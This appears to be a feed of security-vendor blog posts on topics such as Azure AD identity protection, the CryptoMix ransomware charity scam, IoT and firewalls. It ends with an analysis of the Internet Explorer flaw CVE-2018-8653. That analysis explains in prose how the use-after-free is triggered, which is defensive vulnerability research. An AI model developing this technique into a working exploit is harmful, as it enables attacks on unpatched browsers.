Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post Windows Defender ATP integrates with Microsoft Information Protection to discover, protect, and monitor sensitive data on Windows devices appeared first on Microsoft Secure.

Report: Iranian APT Actors Regroup After Main Security Forum Shuts Down

Iranian state-sponsored hackers are regrouping after the shutdown last year of their main security forum, migrating to other forums and making new connections for potential cyber-response against mounting political pressures from the United States and Europe, according to a new report.

The post Report: Iranian APT Actors Regroup After Main...

Read the whole entry... »

Related Stories

Step 3. Protect your identities: top 10 actions to secure your environment

The Top 10 actions to secure your environment series outlines fundamental steps you can take with your investment in Microsoft 365 security solutions. In Step 3. Protect your identities, youll learn how to define security policies to protect individual user identities against account compromise and protect your administrative accounts.

Whether or not you have experienced a security incident in the past, you probably know that its not a matter of if an attacker will successfully compromise your corporate resources, but when. This is what is meant by an assume breach mindset. Preventative measures are critical, but in an assume breach” world, so are detection and rapid response. Azure Active Directory (Azure AD) Identity Protection can help you rapidly uncover anomalies or suspicious incidents and configure policies that will automate a response. With Azure AD Privileged Identity Management (PIM), you can protect your administrative accounts. The faster you discover a hacker and take back control, the less damage that attacker can do, saving you time, money, and reputation.

Reduce the time an attacker has access to your network

Most breaches begin with stolen or guessed user credentials. Once hackers gain access, they attempt to escalate those privileges, or they exploit their access to discover and target administrative users with access to valuable data. Rapid detection of a compromised accountno matter its access levelis critical. This can be challenging in a large enterprise with thousands of users.

Azure AD uses machine learning to analyze every sign-in to uncover anomalies or suspicious incidents. It then assigns a risk level of low, medium, or high to indicate how likely it is that the sign-in was not performed by the user. This is called a risk event. Azure AD also analyzes risk events for each user and calculates a risk level of low, medium, or high to indicate how likely it is that a user has been compromised. Azure AD Identity Protection uses this data to generate reports and alerts that can be viewed from a dashboard (Figure 1) in the Azure portal or by enabling daily or weekly emails.

Figure 1. Azure AD Identity Protection reports users who are likely compromised.

Automate response with Azure AD risk-based conditional access policies

In addition to reporting, Azure AD Identity Protection also lets you configure policies to automate a response based on conditions you define. A sign-in risk policy is a conditional access policy that you can configure based on the risk level assigned to a sign-in (Figure 2). A user risk policy is a conditional access policy that you can configure based on the likelihood that a user has been compromised. For example, we recommend that you create a sign-in risk policy that forces all medium-risk sign-ins to use Multi-Factor Authentication (MFA). We also recommend users with a high-risk level be required to safely change their password after verifying their identity using MFA. In both instances, these policies will be enforced automatically without any intervention by an administrator. (Well go into more details about Azure AD conditional access policies in our next blog.)

Figure 2. Apply a policy that blocks or flags risky sign-ins.

Protect your administrative accounts with Azure AD PIM

Even with good detection and response tools, there is still a chance that a hacker will make it through your defenses. In those instances, you need to minimize the likelihood that a compromised account can operate with a privileged role. Azure AD PIM gives you visibility into the users assigned to administrative roles and allows you to establish rules and policies that govern those accounts. Once youve identified the users, you can remove users who dont need privileged access and move remaining user permissions set from permanent to eligible (Figure 3). A user who is eligible for administrative access must request access every time they wish to perform a privileged task. We recommend that you enable MFA for all privileged roles, so you can verify their identity. We also recommend that you establish time limits for administrator access. Users should only have access long enough to complete the privileged task. These steps will make it much more difficult for a hacker to gain access to your most valuable data and resources.

Figure 3. Protect administrative roles by setting users to “Eligible.”

Learn more

Check back in a few weeks for our next blog post, Step 4. Set conditional access policies, where well dive into additional conditional access policies you can apply to your identities to ensure that only authorized people access the appropriate data and apps.

Get deployment help now

FastTrack for Microsoft 365 provides end-to-end guidance to set up your security products. FastTrack is a deployment and adoption service that comes at no charge with your subscription. Get started at FastTrack for Microsoft 365.

Resources

The post Step 3. Protect your identities: top 10 actions to secure your environment appeared first on Microsoft Secure.

The evolution of Microsoft Threat Protection, January update

As the new year begins, progress with Microsoft Threat Protection continues. It remains one of the only solutions available in market, providing comprehensive, end-to-end security for the modern workplace. Microsoft Threat Protection helps users gain optimal security from the moment they sign in to their laptops or mobile devices, check their email or begin work on their documents, or utilize the many cloud applications common in the modern workplace. IT administrators benefit from minimal complexity in staying ahead of the threat landscape, gaining visibility and control over the expanding attack surface, and reducing the time, cost, and effort needed to understand and take action on the trillions of threat signals observed from their IT environment.

In previous posts, we provided examples of how Microsoft Threat Protection helps secure across identities, endpoints, email and data, apps, and infrastructure. We also highlighted how Microsoft Threat Protection quickly and efficiently handled the Tropic Trooper attack campaign. Today, we highlight examples of automation and seamless integration which are core differentiators for Microsoft Threat Protection. We first discuss new automation capabilities that improve security for your apps ecosystem. Next, we share results from the MITRE evaluation that exemplifies how signal sharing across integrated security services helps provide impressive threat detection capabilities for endpoints.

Simplifying the life of SecOps with automated security workflows

Automation is a key attribute of Microsoft Threat Protection. While it comes in many forms, the intent is always to help reduce the burden on security teams tasked with handling the myriad and frequent threats modern organizations deal with. Automation can address basic security needs, enabling security teams to focus on the more challenging security problems. This ultimately helps make organizations less susceptible to threats.

The following example demonstrates how our automation capabilities can simplify the oversight for cloud apps and services. Microsoft Threat Protection helps secure cloud apps and services with Microsoft Cloud App Security, a premier Cloud Access Security Broker (CASB) service. It gives visibility into cloud apps and services, provides sophisticated analytics to identify and combat cyberthreats, and enables control over data travel. Leading organizations such as Accenture leverage the monitoring capabilities of Cloud App Security to detect anomalous behavior in their SaaS and cloud apps. Now imagine adding the benefit of automated workflows to this already powerful service. We have heard feedback in countless discussions with Security Operations (SecOps) professionals that solutions enabling automated processes would help significantly by reducing the number of incidents requiring direct oversight.

To serve this customer need, were excited to announce the integration of Microsoft Flow with Cloud App Security (Figure 1). This new integration supports a series of powerful use cases to enable centralized alert automation and orchestration by leveraging out-of-the-box and custom workflow playbooks that work with the systems of your choice. Microsoft Flow leverages an ecosystem of connectors from over 100 third-party services including ServiceNow, Jira, and SAP. The combination of Cloud App Security and Microsoft Flow will enable security specialists to create playbooks that work with systems of their choice, existing in-house processes, and automating the triage of alerts. Learn more about the detailed use cases and exciting capabilities this integration facilitates.

Figure 1. Microsoft Cloud App Security + Microsoft Flow integration schematic.

Demonstrating industry leading optics and detection for endpoint security

The Microsoft Intelligent Security Graph is the foundational element of Microsoft Threat Protection powering every service in the solution, providing a blend of deep and broad threat signals, and leveraging machine learning for intelligent signal correlation. The Intelligent Security Graph seamlessly integrates all Microsoft Threat Protection services, enabling each to share signal.

For example, Windows Defender Advanced Threat Protection (ATP) correlates signals across endpoints and identities by leveraging signal from Azure ATP (identity security). MITRE recently evaluated Windows Defender ATPs ability to detect techniques used by the attack group APT3 (also known as Boron or UPS). Windows Defender ATPs exceptional capabilities registered the best optics and top detection coverage across the attacker kill chain. Seamless integration is a tenet of Microsoft Threat Protection and the results from the MITRE evaluation provide another example of how seamless integration across different security services leads to exceptional security gains.

It is important to note that MITRE evaluates detection capabilities only. Windows Defender ATP also provides protection and response to threats. In a customer environment, Windows Defender ATP would have blocked many of the attack techniques at onset by leveraging attack surface reduction and next-gen protection capabilities. In addition, investigation and hunting features enable security operations personnel to correlate alerts and incidents, enabling holistic response actions.

To learn more about Microsofts MITRE results, read Insights from the MITRE ATT&CK-based evaluation of Windows Defender ATP and visit the MITRE website. Please reach out to your Microsoft rep to walk through the full details of the results.

Experience the evolution of Microsoft Threat Protection

Take a moment to learn more about Microsoft Threat Protection and read our previous monthly updates. Organizations have already transitioned to Microsoft Threat Protection and partners are leveraging its powerful capabilities.

Begin trials of the Microsoft Threat Protection services today to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace.

The post The evolution of Microsoft Threat Protection, January update appeared first on Microsoft Secure.

AI: New Trends and Threats

Artificial Intelligence (AI) technology continues to evolve at an astounding pace. This year we will see a number of new developments which could have implications for home users like yourself.

Trend: AI-enabled chips

Although impressive, Artificial Intelligence systems are somewhat limited by the physical design of current computer chips. Processors like those found in your laptop at home are built for general workloads – playing games, surfing the web, writing emails etc.

The demands of AI applications are remarkably different however, so existing processors are unable to provide optimal performance. In 2019, manufacturers like Intel, NVIDIA, AMD, Qualcomm and ARM are set to release new chips that are optimised for AI. They will be focused on specific demands, like speech recognition and natural language processing.

What it means for you

As these new chips begin to appear in consumer electronics we should start to see features like voice assistants (Siri, Google Now, Amazon Alexa) become a lot more intelligent and effective. We should also see AI appearing in other technologies like cameras too.

Like every new technology, there is potential for hackers to exploit these chips to steal information or to break into networks. This is particularly true of cutting edge technology which may have bugs or security loopholes that are yet to be identified and fixed by the manufacturer.

Automated Machine Learning “let loose”

At the moment, AI takes a relatively long time to set up. This is because the system must first be taught how to work using a process called “Machine Learning” (ML). Usually this involves feeding large amounts of data into the system, then training it to understand what the information means.

Take Google’s Deep Learning system which can help to diagnose cancer for instance. Researchers fed thousands of breast scan images into the program, and then taught the application which pictures were positive for the presence of cancerous cells, and those which were clear. Eventually the system learned how to read the images automatically without needing guidance.

The problem is that this Machine Learning process can take a considerable amount of time to get right. Deep Mind has been years in the making.

2019 will see the release of a new development called AutoML, a technology designed to speed up and automate the training process. In future, developers will be able to define their application and expected outcomes, and AutoML will take care of the training and learning. This will make it much quicker and easier to build and release smart applications.

What does this mean for you?

Examples like Google Mind show how AI and Machine Learning can change the world. But at the same time, if AI is left to train itself without any safeguards in place, it is very difficult to predict potential outcomes. There is nothing to say that every decision or outcome made by the system will be positive or healthy.

Traditional coding errors create software bugs that can be exploited by cybercriminals. Similarly, misconfigured AutoML systems could create their own security weaknesses if not closely monitored by AI developers. If your data is held in one of these AI applications, there may be a risk of information being leaked, lost or stolen.

2019 – an exciting year

Artificial Intelligence systems are finally maturing and beginning to have an effect on day-to-day life. In most cases we will never see AI at work – but we should all begin to benefit in the near future.

The post AI: New Trends and Threats appeared first on Panda Security Mediacenter.

Cybersecurity Is Every Leader’s Job

Every organization is led by people who are responsible for setting the overall direction, establishing priorities, maintaining influence over organizational functions and mitigating risks. Given the wide range of organizational types across industry sectors, the titles associated with these roles may vary greatly from CEO to Managing Director to Owner-Operator and beyond, but they share […]… Read More

The post Cybersecurity Is Every Leader’s Job appeared first on The State of Security.

Children’s Charity or CryptoMix? Details on This Ransomware Scam

As ransomware threats become more sophisticated, the tactics cybercriminals use to coerce payments from users become more targeted as well. And now, a stealthy strain is using deceptive techniques to mask its malicious identity. Meet CryptoMix ransomware, a strain that disguises itself as a children’s charity in order to trick users into thinking they’re making a donation instead of a ransom payment. While CryptoMix has used this guise in the past, they’ve recently upped the ante by using legitimate information from crowdfunding pages for sick children to further disguise this scheme.

So, how does CryptoMix trick users into making ransom payments? First, the victim receives a ransom note containing multiple email addresses to contact for payment instructions. When the victim contacts one of the email addresses, the “Worldwide Children Charity Community” responds with a message containing the profile of a sick child and a link to the One Time Secret site. This website service allows users to share a post that can only be read once before it’s deleted. CryptoMix’s developers use One Time Secret to distribute payment instructions to the victim and explain how their contribution will be used to provide medical help to sick children. The message claims that the victim’s data will be restored, and their system will be protected from future attacks as soon as the ransom is paid. In order to encourage the victim to act quickly, the note also warns that the ransom price could double in the next 24 hours.

After the victim makes the payment, the ransomware developers send the victim a link to the decryptor. However, they continue to pretend they are an actual charity, thanking the victim for their contribution and ensuring that a sick child will soon receive medical help.

CryptoMix’s scam tactics show how ransomware developers are evolving their techniques to ensure they make a profit. As ransomware threats become stealthier and more sophisticated, it’s important for users to educate themselves on the best techniques to combat these threats. Check out the following tips to help keep your data safe from ransomware:

  • Back up your data. In order to avoid losing access to your important files, make copies of them on an external hard drive or in the cloud. In the event of a ransomware attack, you will be able to wipe your computer or device and reinstall your files from the backup. Backups can’t always prevent ransomware, but they can help mitigate the risks.
  • Never pay the ransom. Although you may feel that this is the only way to get your encrypted files back, there is no guarantee that the ransomware developers will send a decryption tool once they receive the payment. Paying the ransom also contributes to the development of more ransomware families, so it’s best to hold off on making any payments.
  • Use security software. Adding an extra layer of security with a solution such as McAfee Total Protection, which includes Ransom Guard, can help protect your devices from these types of cyberthreats.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Children’s Charity or CryptoMix? Details on This Ransomware Scam appeared first on McAfee Blogs.

How the government shutdown is influencing cybersecurity jobs

As of this writing, the government shutdown of 2019 is the longest ever in America. The only good news about this situation is that, with each passing day, a new group of people in the country seems to rediscover just how essential government services are, now that they’re unavailable.

The next likely casualty is the government’s stable of cybersecurity talent. Here’s why—and what it might mean for us in the long run.

How much government talent is furloughed?

Some of us might be surprised to learn the federal government has a workforce dedicated solely to cybersecurity. Many of these completely essential institutions and teams are now reduced to skeleton crews. This has the potential for long-lasting harm when it comes to the government’s ability to retain these specialists.

At time of writing, the Department of Homeland Security has furloughed 20 percent of its staff dedicated to “main cyber operations,” as well as administrative and supporting roles. But when you look at the entire cybersecurity apparatus of the federal government, the total potential loss of talent is far greater than the DHS alone. According to a planning document, 43 percent of the entire US cybersecurity workforce is currently furloughed.

Taking the top spot, however, is the National Institute of Standards and Technology, or NIST, with 85 percent of its staff furloughed.

This represents a danger today on a number of levels. But there’s a longer-lasting kind of harm, too, that few are talking about right now.

Will federal employees flock to the private sector?

Some of the more important staff and talent initiatives taken on during the Obama administration concerned the treatment, compensation, and benefits of federal employees and contractors. The goal was to make the public sector (the government) more competitive with the private sector. That’s how corporations retain talent, and it’s how the government can do so as well.

It’s no secret that job prospects for computer scientists, and cybersecurity specialists in particular, are rather cushy right now. Software developers enjoy a median income of more than $100,000 per year.

But now that the government is shut down, Washington, D.C. (and all of our state governments) will struggle even more not only to win talent over from the private sector, but keep it. With paychecks potentially off the table for a while, it’s becoming more likely that this already fragile situation will be pushed to the breaking point.

In an interview with the Washington Post, a former DHS cyber official named Greg Garcia explained the situation: “There’s unpredictability and uncertainty and instability [for DHS cyber employees],” he said. “Add on top of all that not getting paid, and I do not envy them.”

The problem here is one of morale. We have not been trying hard enough in recent years to maintain the government’s competitiveness with industry, and now we’re paying the price.

What does the future hold for cybersecurity talent at the federal level?

The bottom line with this government shutdown, just like with any other, is that sending your employees home without pay, and without a timetable for when their jobs and offices will be back up and running, is a bad way to do business.

What we’re likely to see is a “chilling effect” on the next generation or two of potential government employees. Holding these positions hostage in budget negotiations, positions for which applicants earned degrees and accreditation, is the equivalent of telling them the government isn’t an honorable employer and their talent isn’t valued—and that we don’t care if they take it elsewhere.

And there’s plenty of “elsewhere” for them out there, it turns out. In 2017, there were nearly 300,000 jobs available in the “cyber sciences.” That sounds like a lot of opportunities—but it will actually blossom into a full-blown talent shortage of 1.8 million jobs by 2022.

We don’t really want to be turning people off from this line of work—especially not when the stakes are so high. Moreover, it’s clear the government can’t afford to lose the talent it’s already brought together. There’s not going to be enough of it to go around before too long—and the priorities, arguably, should rest with national security.

Remembering the stakes

Barely a day goes by where we’re not reminded that, just as it has brought us closer together, Internet connectivity has also provided new tools for potential disruptive influences.

Reports are available now detailing the degree to which critical national infrastructure—such as our nuclear and other power plants, water treatment facilities, and electrical grids—are surprisingly vulnerable to domestic as well as foreign hacking attempts. This is a bright and wonderful age, but it’s clear that many of the systems we rely on for civilized living aren’t as safe as they’re supposed to be.

We should remember that even our voting machines are outdated and stand a good chance of being hacked or otherwise tampered with. But while public awareness of these issues has increased, furloughing and devaluing cyber talent at the federal and state levels is not a good way to drum up attention and support for such important issues.

Are there any foreseeable solutions to this problem?

The first solution involves remembering that the US Defense Department, even before the government was shut down, was already losing some 4,000 employees to the private sector every year, a sign that our government was already a dissatisfactory place to work. In point of fact, “dissatisfied” or “very dissatisfied” was how 20 percent of DHS employees described their jobs in a survey that made the rounds in 2018.

Even some of the most critical resources on the Internet have been taken offline by this shutdown. NIST maintains catalogs of government cybersecurity standards that are essential for maintaining webpage uptime and HTTPS certificates. With 85 percent of their staff sitting at home, security certificates will expire and websites will be taken down.

When resources like these are unavailable, the Internet becomes a manifestly less safe place to spend time. And that’s the last thing we want.

The post How the government shutdown is influencing cybersecurity jobs appeared first on Malwarebytes Labs.

Microsoft gains strong customer and analyst momentum in the Cloud Access Security Brokers (CASB) market

After a strong year of product updates and innovations, were excited to so see that Microsoft jumped into the Challenger position in Gartners 2018 Magic Quadrant for Cloud Access Security Brokers (CASB) and solidified its leadership position in KuppingerColes 2018 Leadership Compass in the same product category, backed by strong customer adoption rates.

CASBs give organizations the ability to securely embrace the possibilities of their cloud apps and services and they can be crucial in driving a successful cloud security strategy.

While the market for CASB is still relatively young, analyst firm Gartner, Inc. predicts that 60 percent of large enterprises will be using CASB technologies by 2020, with independent forecasts expecting to reach a total addressable market of $7.5 billion in the same timeframe.

We have seen a steep increase in the adoption of Microsoft Cloud App Security across all customer segments, ranging from large enterprises such as global energy leader BP, to smaller organizations such as Affinity Workforce. Our internal estimates show that Microsoft Cloud App Security has a current market share of more than 30 percent in the CASB space. This provides us with insights from billions of signals every dayand direct input from the many organizations that we work withallowing us to continuously improve the product and react to what were seeing in the market.

By integrating with leading security, identity, and productivity solutions across Microsoft 365, Microsoft Cloud App Security is uniquely positioned to drive innovation in the CASB space. Recent additions include our native integration with Windows Defender Advanced Threat Protection and our consistent labeling experience via Azure Information Protection. Among many others, these help organizations gain visibility into their cloud apps and services, provide sophisticated analytics to identify and combat cyber threats, and control the travel of sensitive information to equally support Microsofts native cloud services, as well as numerous third-party cloud apps and services, such as Dropbox, Salesforce, and others.

Microsoft Cloud App Securitys portfolio of native product integrations.

2018 analyst momentum

In Gartners 2018 report, we significantly improved our positioning and moved along both axes, Completeness of Vision as well as Ability to Execute, up from a Niche Player to a Challenger position. We see the substantial improvement as a testimony to our strong ability to execute against our feature roadmap and the momentum we are gaining with customers.

Magic Quadrant for CASB. Source: Gartner (October 2018)*

In its 2018 report, analyst firm KuppingerCole positions Microsoft as a Leader for the second year in a row. This further emphasizes the strength of our native integrations across Microsoft 365, including Azure Active Directory (Azure AD), Office 365, and Azure Security Center, and the significant customer base of Microsoft Cloud App Security.

Leadership Compass for CASB. Source: KuppingerCole (October 2018)

This years results confirm Microsofts strong commitment and rapid progress in this spaceand with the progress of the overall market, the importance for organizations to start considering the use of a CASB continues to increase.

Learn more

We made both these 2018 analyst reports available for review. Download the Gartner Magic Quadrant 2018 for CASBs report and the KuppingerCole Leadership Compass 2018 report.

If youre not using Microsoft Cloud App Security, start a free trial today and learn how to get started with our detailed technical documentation.

If you have any suggestions, questions, or comments, please visit us on our Tech Community page.

To stay up to date with our latest product innovations, follow our product blog.

 

*This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Microsoft.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartners research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

The post Microsoft gains strong customer and analyst momentum in the Cloud Access Security Brokers (CASB) market appeared first on Microsoft Secure.

How to Secure Your Mid-Size Organization From the Next Cyber Attack

If you are responsible for the cybersecurity of a medium-sized company, you may assume your organization is too small to be targeted. Well, think again. While the major headlines tend to focus on large enterprises getting breached – such as Sony, Equifax, or Target the actual reality is that small and mid-sized companies are experiencing similar threats. According to Verizon’s 2018 Data

Addressing The Elephant in the Room: Cybersecurity’s Increasing Talent Shortage

The cybersecurity space is in dire straits. Hackers are getting smarter and more sophisticated…and the availability of skilled men and women to combat them has never been lower. It’s an issue that’s been slowly growing worse year over year, yet there’s no clear solution in sight. What’s a business leader to do? The good news […]… Read More

The post Addressing The Elephant in the Room: Cybersecurity’s Increasing Talent Shortage appeared first on The State of Security.

What is the Internet of Things

We are constantly connected in the world we live in today. Picture a typical “connected” day as it is today. We ask “Alexa” the weather forecast in the morning and Google Home to start a timer as we get breakfast started. Then, we head for our morning jog, our every step tracked on a Fitbit. The Internet of Things is everywhere and has become a part of our daily routine.

What is the Internet of Things (IoT)?

We have all heard this term, and to many, it feels a bit ambiguous. IoT or Internet of Things refers to any device that is connected to the internet and is collecting or sharing data. The machine-to-machine (M2M) data that is generated from IoT has an array of uses but it’s most commonly seen as a way to determine the health and status of things.

It includes everything from coffee makers, cellphones, washing machines, wearable devices and headphones. For example, a coffee maker can tell you when coffee is ready, wearable devices determine your health and a washing machine can let your phone know when clothes are complete.

It also applies to components of machines like the jet engine of an airplane. Most likely if a device has an on and off switch to the internet, it can be a part of the IoT. By combining one’s connected devices with automated systems, it’s possible to gather information about the user and learn from a process.

Examples of Internet of Things Devices:

  • Wearable devices
  • Connected cars
  • Intelligent personal assistant
  • Smart farming
  • Light bulb connected via an app
  • Smart thermostat
  • Connected toy

The History of IoT

The idea of adding intelligence to standard objects has been discussed since the 1980s. In films, “smart devices” were seen as the way of the future. In Back to the Future II, the McFly family uses glasses that serve as a precursor to the Google Glass. The 1990 film Total Recall uses a self-driving car to take Arnold Schwarzenegger around. Smart House, a Disney film from the ‘90s has a completely computerized home.

Humans were curious about Internet of Things, but did not quite have the technology. One early example of IoT is a Coke machine in the early 1980s that allowed programmers to check if Coke was available in the machine before visiting it. In 1990, John Romkey showed that a toaster could be turned on and off by the internet.

The term Internet of Things was first coined by Kevin Ashton during a presentation he made to Proctor and Gamble in 1999. He pushed the importance of radio frequency identification to the company and titled his presentation “Internet of Things.” He emphasized that the internet was one of the hottest trends of the late ‘90s into his talk.

That’s when connected devices began to take off. In 1995, less than 1% of the world’s population had internet access. As of December 2017, more than 54% of the population has internet access. There are 8.5 billion smart devices connected to the internet, with that number increasing substantially each day.

How the Internet of Things Works

In the Internet of Things, each device has a different purpose. Many are used for collecting data. For example, a wearable device that tracks your daily steps and heart rate helps you monitor your health.

There are three “layers” when it comes to operating IoT devices: the dashboard, cloud and then your devices.

The device sends its signal to the cloud, where other devices are also sending their information to. The cloud is where all the machines interact with each other. From there, this information gets sent to your dashboard, which is where you control your device.

The Internet of Things Ecosystem

The IoT ecosystem refers to all of the components that enable businesses, consumers and the government to connect to their IoT devices. It has been named “the next Industrial Revolution” as it has already begun changing the way people live, work and travel. Business Insider has been tracking the growth of the IoT for more than two years and created an exhaustive report on the IoT ecosystem. We added some of the key results below.

  • There will be 34 billion devices connected to the internet by 2020.
  • IoT can lower operating costs, increase productivity and expand to new markets for businesses.
  • Nearly $6 trillion will be spent on IoT solutions within the next five years.

Industries Affected by Internet of Things

While IoT is expected to help every day consumers stay connected and track their lives, there are several industries that will also benefit from IoT.

These include but are not limited to:

  • Agriculture
  • Infrastructure
  • Manufacturing
  • Defense
  • Retail
  • Banks
  • Oil and mining
  • Insurance
  • Connected homes/smart buildings
  • Utilities
  • Smart cities
  • Healthcare

Major IoT Companies

Hundreds of companies have created devices that link to the Internet of Things and the number will continue to increase in the years to come. Below, we list some of the companies that stand out in the IoT revolution.

  • DHL
  • Amazon
  • Magneto IT Solutions
  • Microsoft
  • HQSoftware
  • Google
  • IBM
  • GE
  • Verizon
  • Fitbit
  • Jasper
  • Cisco
  • Honeywell

The Future of IoT

This new world of connected devices allows our environment, including our home and work life, to become smarter and more measurable. Smart speakers make it easy to play music, get quick facts or set a timer. Home security systems make it easy to monitor your home while you’re away. Smart cars can help us dial numbers and text hands-free, potentially saving thousands of lives. So what’s next for IoT?

A report from Samsung states that the need to secure every connected device by 2020 is critical. Brian Solis from Altimeter Group who worked on future IoT research, states that companies will indulge in digital Darwinism where we learn to rapidly evolve. IoT is also beginning to integrate its data into artificial intelligence systems which take that IoT data and use it to make predictions. For example, Google uses an AI to run its data center cooling system.

Another way IoT is changing the future? Smart city projects are becoming a key feature of IoT. Using data collection sensors over a town or city, planners can get an accurate idea of what’s happening in real time. This could prevent heavy traffic, detect water leakages and locate items in a large warehouse or harbor.

Many cities have begun implementing smart city projects. Barcelona has implemented sensor technology in the irrigation system to detect water quality for plants. Stockholm uses energy-efficient buildings, traffic monitoring and the development of e-services (vs. paper).  

Staying Secure

IoT is revolutionizing the workplace and how we live on a day-to-day basis. Smart cities are popping up around the world and smart homes give us the capability to ask a question and receive an answer anywhere at any time. While it’s fantastic to stay connected 24/7, it’s important to keep in mind the potential risks and security concerns.

As more connected devices continue to make their way into our daily routines, we are also more vulnerable to hacking. Because the technology is relatively new it’s important to keep in mind that connected devices are not foolproof. Below, we list the top ways to stay secure using Internet of Things devices including using a VPN to encrypt data and remembering to update software regularly.

Sources:

Business Insider | Think Mobiles | Cloudwares | ZDNet | Forbes | Wired | Business Insider | Internet of Things Agenda | IoT For All |

The post What is the Internet of Things appeared first on Panda Security Mediacenter.

What is a firewall?

You’ve probably heard the word “firewall” a few times in recent years. There was even a 2006 Hollywood movie of the same name starring Harrison Ford, Paul Bettany and Virginia Madsen.

But what is a firewall, and why do they matter?

Keeping the bad guys out

At the most basic level, a firewall is a system that prevents unauthorised access to a network. The firewall acts like a bouncer at the entrance to the network, checking the identification of everyone who tries to enter. Any unauthorised access attempt is blocked automatically.

How does a firewall work?

Before you can properly understand why firewalls matter, you first need to understand a tiny bit about how data is sent between computers.

Say you email a document to a colleague. Your computer splits the document into tiny pieces called packets which are then sent one at a time to your colleagues computer. Each packet contains additional information that tells the recipient’s computer how to rebuild the document from the packets – and where the packets are coming from. This whole process can be completed in a matter of seconds.

Network data transfers aren’t fool proof though. Packets can get corrupted or lost during transfer. Or they can be intercepted and modified by hackers.

A firewall adds an important layer of protection into the data transfer mechanism. The firewall sits between your computer and the recipient’s, checking every packet that passes through. Any network traffic that has been faked, is coming from an unauthorised or unrecognised source, or is otherwise suspicious is blocked automatically.

The firewall does a lot more besides too. It monitors all network traffic, preventing hackers from breaking into your computer or other internet-connected devices.

Why do firewalls matter?

In a business environment, the firewall is installed at the edge of the network; all network traffic has to pass through the firewall, and is analysed in transit. And the same is true of application firewalls like those included with Panda Dome that are installed on home computers.

Effective network security works on the principle of blocking suspicious traffic before it reaches your computer. In a corporate network, that means stopping hackers before they can access the network. At home, you need to drop/block bad network traffic before it can reach the data stored on your computer.

A firewall is not the same as antivirus – it does not check to see whether incoming packets contain malware. But it does automatically block the most suspicious network traffic to keep criminals out. Like antimalware systems however, a good firewall is also regularly updated so that it is capable of blocking the latest threats and suspicious activities.

And this automated checking is an important tool for raising the overall level of protection for your home computer and data.

To learn more about firewalls, please take a look at the Panda knowledgebase. And if you’d like to protect your computer with a firewall now, please download a free trial of Panda Dome Security.

Download Panda FREE VPN

The post What is a firewall? appeared first on Panda Security Mediacenter.

IE Scripting Flaw Still a Threat to Unpatched Systems: Analyzing CVE-2018-8653

Microsoft recently patched a critical flaw in Internet Explorer’s scripting engine that could lead to remote code execution. The vulnerability is being exploited in the wild and was originally reported by a researcher from Google’s Threat Analysis Group. Microsoft released an out-of-band patch to fix the vulnerability before the normal patch cycle. McAfee products received an update to detect the threat shortly after the patch was released.

A remote attacker can target Internet Explorer Versions 9 through 11 via a specially crafted website, while a local attacker on a rogue network could also target the Web Proxy Auto-Discovery service, which uses the same vulnerable scripting engine (jscript.dll). Microsoft Edge is not affected; however, other Windows applications that include the scripting engine might be vulnerable until the security patch from Microsoft is applied.

Context

Vulnerabilities targeting Internet Explorer that can be triggered either remotely or locally are prime tools for cybercriminals to compromise many unpatched computers. That is why criminals usually integrate those vulnerabilities into exploit kits, which propagate malware or conduct other nefarious activities against compromised hosts. The threat of exploit kits is one reason to track this type of vulnerability and to ensure all security patches are deployed in a timely manner. In 2018, more than 100 memory corruption vulnerabilities were found in a Microsoft scripting engine (either for Internet Explorer or Edge). See the MITRE website for more details. (For defense-in-depth, products such as McAfee Endpoint Security or McAfee Host Intrusion Prevention can detect and eradicate such threats until patches can be applied.)

Once a CVE ID is released, cybercriminals can take as little as a few weeks (or in some cases days) to integrate it into their exploit kit. For example, CVE-2018-8174 was initially reported to Microsoft in late April by two teams of threat researchers who had observed its exploitation in the wild. Microsoft published an advisory within a week, in early May. Meanwhile, the researchers published their security analysis of the exploit. Only two weeks later a proof-of-concept exploit was publicly released. In the next couple of weeks exploit kits RIG and Magnitude integrated their weaponized versions of the exploit. (A more detailed timeline can be found here.)

It took less than a month for cybercriminals to weaponize the vulnerability initially disclosed by Microsoft; therefore, it is critical to understand the threat posed by these attack vectors, and to ensure counter measures are in place to stop the threat before it can do any damage.

Technical details

The IE scripting engine jscript.dll is a code base that has been heavily audited:

It is no surprise that exploitable bugs are becoming more exotic. This is the case for CVE 2018-8653, which takes three seemingly innocent behaviors and turns them into a use-after-free flaw. A Microsoft-specific extension triggers a rarely explored code path that eventually misbehaves and invokes a frequently used function with unusual arguments. This leads to the use-after-free condition that was exploited in the wild.

The enumerator object: The entry point for this vulnerability is a Microsoft-specific extension, the enumerator object. It offers an API to enumerate opaque objects that belong to the Windows world (mostly ActiveX components, such as a file system descriptor used to list drives on a system). However, it can also be called on a JavaScript array. In this situation, one can access the array member as usual, but objects created this way are stored slightly differently in memory. This is the cause of interesting side effects.

The objects created by calling the Enumerator.prototype.item() function are recognized as an ActiveXObject and, as seen in the creation of eObj, we can under certain circumstances overwrite the “prototype” member that should have been a read-only property.

Unexpected side effect: The ability to overwrite the prototype member of an ActiveXObject can seem innocuous at first, but it can be leveraged to explore a code path that should not be reachable.

When using the “instanceof” keyword, we can see that the right side of the keyword expects a function. However, with a specially crafted object, the instanceof call succeeds and, worse, we can control the code being executed.

The edge case of invoking instanceof on a specially crafted ActiveXObject gives us the opportunity to run custom JavaScript code from a callback we control, which is typically an error-prone situation.

Attackers successfully turned this bug into a use-after-free condition, as we shall see next.

Exploiting the bug: Without getting into too much detail (see the proof of concept later in this document for more info), this bug can be turned into a “delete this” type of primitive, which resembles previously reported bugs.
When the callback function (“f” in our previous example) is invoked, the keyword “this” points to eObj.prototype. If we set it to null and then trigger a garbage collection, the memory backing the object can be freed and later reclaimed. However, as mentioned in the Project Zero bug report, to be successful an entire block of variables needs to be cleared before the memory is freed.

The out-of-band patch: Microsoft released an unscheduled patch to fix this vulnerability. It is common practice for us to look at what changed before and after the patch. Interestingly, this patch changes the strict minimum number of bytes, while the version number of the DLL remains unchanged.

